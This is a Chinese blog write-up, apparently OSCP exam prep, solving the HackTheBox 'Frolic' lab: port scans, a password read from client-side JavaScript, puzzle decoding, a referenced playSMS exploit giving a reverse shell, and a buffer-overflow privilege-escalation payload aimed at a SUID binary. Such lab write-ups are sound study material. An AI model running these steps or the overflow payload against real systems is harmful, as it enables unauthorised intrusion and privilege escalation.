OSCP备考_0x21_HackThBox靶机_Linux_frolic

Ethan医生2天前靶场8

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)

image.png

nmap -p139,445 -A -T5 --script=smb-enum-shares 10.129.135.112

image.png


nmap -sU --top-ports 100 10.129.135.112 (扫描UDP)

image.png

gobuster dir -u http://10.129.135.112:9999/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png




http://10.129.135.112:1880/

image.png

http://10.129.135.112:9999/

image.png


http://10.129.135.112:9999/backup/

image.png

再尝试登入admin的时后发现没有提交到后台 查看下前端验证,http://10.129.135.112:9999/admin/js/login.js

很明显密码为superduperlooperpassword_lol

image.png

image.png

登入成功后出现这个

https://www.dcode.fr/ook-language尝试解密

Nothing here check /asdiSIAJJ0QWE9JAS


http://10.129.135.112:9999/backup/password.txt

image.png

image.png

出现账号密码:imnothuman,尝试登入1880端口也无法登入

http://10.129.135.112:9999/asdiSIAJJ0QWE9JAS/

image.png

访问后发现类似base64的挡案 直接进行解密后保存 看文件挡案是啥

image.png

然后进行爆破

image.png

发现16进制文件

image.png


解密出来跟上面一样 ,又回到刚开始的密码学知识点,再次将其解密,地址:https://www.splitbrain.org/_static/ook/



然后扫描路径的时后发现/dev/backup底下还有个cms

直接使用cms拿下SHELL

http://10.129.135.112:9999/playsms/index.php?app=main&inc=core_auth&route=login

image.png


对应的exploit地址:https://www.exploit-db.com/exploits/42044

反弹SHELL结束后...

读取完成user.txt之后查找4000权限的文件

找到一个二进制文件,知道本靶机需要使用缓冲区溢出漏洞进行提权,具体分析可参考:https://0xdf.gitlab.io/2019/03/23/htb-frolic.html

./rop `python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + '\xd0\x79\xe4\xb4' + '\x0b\x4a\xf7\xb7'"`


标签: OSCP

相关文章

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。